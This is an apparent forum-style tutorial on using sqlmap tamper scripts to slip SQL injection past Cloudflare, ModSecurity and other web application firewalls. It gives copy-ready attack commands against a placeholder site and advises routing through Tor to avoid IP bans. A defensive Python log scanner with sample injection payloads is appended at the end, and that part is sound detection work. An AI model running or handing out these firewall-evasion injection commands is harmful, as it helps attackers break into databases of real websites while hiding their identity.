
Bypass CloudFlare, ModSecurity, & Unidentified WAFs | SQL Injections | SQLMAP



If SQLMAP informs you that the target is protected by a WAF/IPS/IDS, it can be difficult to perform the injection.
Checking for a possible WAF can be done with the --identify-waf switch. If there is one in place, the three most likely results are:
  • Cloudflare
  • Mod Security
  • Unidentified
The --tor switch should also be used to avoid having your IP address banned.


Cloudflare bypass:
sqlmap -u "https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="between,randomcase,space2comment"

Mod Security bypass:
sqlmap -u "https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned"

I find that the Mod Security scripts also work well for 'Unidentified'.

Unidentified bypass:
sqlmap -u "https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned"
If you want to be noisy and try every tamper script available, you can do the following. Make sure you have the latest version of SQLMAP.

Hail Mary:
sqlmap -u "https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"
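The tamper scripts named above (space2comment, randomcase, between and the two modsecurity versioned-comment scripts) each leave a recognisable trace in web-server logs, which is what a defender can key on when a WAF has been bypassed. The following Python is an added example, not code from the original post or from sqlmap: it undoes those transformations on each query-string parameter and flags requests that then read as plain SQL. The log lines are constructed samples and the function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Traces left by the tamper scripts discussed on the page:
#   space2comment -> spaces become /**/      randomcase -> keyword case shuffled
#   modsecurity*versioned -> payload wrapped in MySQL /*!NNNNN ... */ comments
#   between -> comparisons rewritten as "NOT BETWEEN 0 AND ..."
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
ANY_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SQL_PATTERN = re.compile(
    r"\b(union\s+(all\s+)?select|select\s+.+\s+from|and\s+\d+\s*[=<>]\s*\d+"
    r"|not\s+between\s+\d+\s+and)\b", re.I)

def normalize(value: str) -> str:
    """Undo the obfuscations above so a plain keyword match can run."""
    for _ in range(3):                      # bounded: handles double encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED_COMMENT.sub(r" \1 ", value)  # expose the hidden payload
    value = ANY_COMMENT.sub(" ", value)            # /**/ -> space
    value = re.sub(r"[\s+]+", " ", value)          # collapse whitespace and '+'
    return value.strip().lower()                   # defeat randomcase

def looks_like_sqli(value: str) -> bool:
    return SQL_PATTERN.search(normalize(value)) is not None

def scan_access_log(lines):
    """Return (line_number, normalized_parameter) for suspicious GET requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"GET (\S+)', line)
        if not m or "?" not in m.group(1):
            continue
        for param in m.group(1).split("?", 1)[1].split("&"):
            raw = param.partition("=")[2]
            if looks_like_sqli(raw):
                hits.append((n, normalize(raw)))
                break
    return hits

# Constructed sample log lines (not real traffic): one clean request, then
# one request per obfuscation style listed above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "GET /index.php?id=1/**/uNiOn/**/aLl/**/sElEcT/**/1,2,3 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:03 +0000] "GET /index.php?id=1%20/*!00000AND%202%3E1*/-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:04 +0000] "GET /index.php?id=1%20AND%202%20NOT%20BETWEEN%200%20AND%201 HTTP/1.1" 200 512',
]
```

Running scan_access_log(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the clean first request alone.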